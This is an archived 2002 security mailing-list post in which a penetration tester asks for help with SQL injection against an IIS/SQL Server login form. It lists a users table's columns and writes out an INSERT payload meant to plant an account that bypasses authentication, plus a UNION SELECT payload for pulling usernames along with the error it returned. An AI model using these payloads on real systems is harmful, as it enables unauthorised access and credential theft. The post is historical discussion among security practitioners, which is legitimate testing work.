sql table data enumeration help please.

From: Gary O'leary-Steele (GaryO@sec-1.com)
Date: Thu May 09 2002 - 15:47:43 EDT

• Next message: Chris Reining: "Re: DID Range Enumeration"
• Previous message: Akatosh: "Re: DID Range Enumeration"
• Next in thread: Kevin Spett: "Re: sql table data enumeration help please."
• Reply: Kevin Spett: "Re: sql table data enumeration help please."
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Hi all,

I am currently performing a pen test against a web server using IIS with SQL
integration. There is a user name and password form which I want to bypass
and enumerate existing usernames and passwords.

I have discovered the following columns/table data

tblusers.ID uniqueidentifier
tblusers.createdtimestamp smalldatetime
tblusers.sessionID nvarchar
tblUsers.LastUpdated smalldatetime
tblUsers.LastUpdatedIP nvarchar
tblUsers.LastUpdatedBy uniqueidentifier
tblUsers.CompanyType nvarchar
tblUsers.CompanyID uniqueidentifier
tblUsers.Password nvarchar
tblUsers.UserName nvarchar
tblUsers.Title nvarchar
tblUsers.Surname nvarchar
tblUsers.Forename nvarchar
tblUsers.AddressTo nvarchar
tblUsers.Appointment nvarchar
tblUsers.DirectPhone nvarchar
tblUsers.Mobile nvarchar
tblUsers.DirectEmail nvarchar
tblUsers.DirectFax nvarchar
tblUsers.Signature The text, ntext, and image data types are invalid in
this subquery or aggregate expression.
tblUsers.Address1 nvarchar
tblUsers.Address2 nvarchar
tblUsers.Address3 nvarchar
tblUsers.Address4 nvarchar
tblUsers.Address5 nvarchar
tblUsers.PostCode nvarchar
tblUsers.HomePhone nvarchar
tblUsers.UserAccess bit

I want to update the table to bypass the auth screen

I have tried

-------------
www.target.comUserName='insert into
tblusers(createdtimestamp,sessionID,LastUpdated,LastUpdatedIP,LastUpdatedBy,
CompanyType,CompanyID,Password,username,title,surname,forename,AddressTo,App
ointment,DirectPhone,Mobile,DirectEmail,directfax,signature,address1,address
2,postcode,Homephone,UserAccess) values ('Oct 31 2000 8:52PM','7654','Oct 31
2000
8:52PM','127.0.0.1','','securitycompany','','test','test','mr','oleary','gar
y','addrto','appointment','01131234567','07796698919','garyo@sec-1.com',0113
1234567','sig','123','456','ls287sr','01132297541',1)--

------------

But had no joy

In an attempt to gain access to data held with the username and password
fields I have tried

www.target.com/UserName='Union select 1,1,1,1,1,1,1,1,min(UserName) from
tblusers where username >'a'--&password=hacker

but get "Operand type clash: uniqueidentifier is incompatible with int"

Any help would be greatly appreciated

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

• Next message: Chris Reining: "Re: DID Range Enumeration"
• Previous message: Akatosh: "Re: DID Range Enumeration"
• Next in thread: Kevin Spett: "Re: sql table data enumeration help please."
• Reply: Kevin Spett: "Re: sql table data enumeration help please."
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:20 EDT